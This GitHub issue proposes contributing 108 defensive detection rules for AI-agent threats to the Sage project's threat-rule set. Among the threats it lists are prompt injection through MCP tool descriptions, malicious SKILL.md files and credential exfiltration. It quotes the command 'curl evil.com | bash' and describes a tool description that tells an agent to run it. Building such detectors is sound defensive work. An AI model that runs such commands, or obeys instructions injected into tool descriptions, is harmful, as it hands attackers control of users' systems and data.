Skip to content

ATR agent-layer threat rules — 108 rules for MCP/SKILL.md threats (shipped in Cisco AI Defense) #30

@eeee2345

Description

@eeee2345

Hi Sage team,

ATR (Agent Threat Rules) maintains 108 open-source detection rules focused on AI agent-layer threats — prompt injection via tool descriptions, malicious SKILL.md files, credential exfiltration through MCP responses, and supply chain attacks on skill registries. Same rules that Cisco AI Defense ships in production (cisco-ai-defense/skill-scanner#79).

Sage's existing 313 rules cover OS/command-layer threats excellently. ATR rules cover the agent protocol layer that sits above — threats that arrive through MCP tool descriptions and SKILL.md files before they become OS commands.

Example gap ATR fills: Sage catches curl evil.com | bash (command layer). ATR catches the MCP tool description that instructs the agent to run curl evil.com | bash — before the command is ever generated.

What ATR covers (not in Sage today):

  • Prompt injection in tool descriptions (10 patterns)
  • Malicious SKILL.md content (10 patterns)
  • Hidden LLM instructions in MCP responses (10 patterns)
  • Credential exfiltration via agent context (10 patterns)
  • Fork impersonation / typosquatting skills (10 patterns)
  • Agent manipulation / social engineering (10 patterns)
  • 7 more categories (87 total high-confidence patterns)

Tested on: 53,577 real-world MCP skills, 0% FP on clean content.

Questions before we submit a PR:

  1. Would ATR patterns fit in existing threats/ files (e.g. a new agent-threats.yaml) or a separate directory?
  2. ATR rules use match_on: content — does that align with Sage's content matching?
  3. Our rules are MIT licensed. Your threats/ dir uses DRL-1.1. Should we relicense contributed patterns to DRL-1.1?

Happy to convert ATR patterns to your exact YAML schema. We use a very similar format already.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions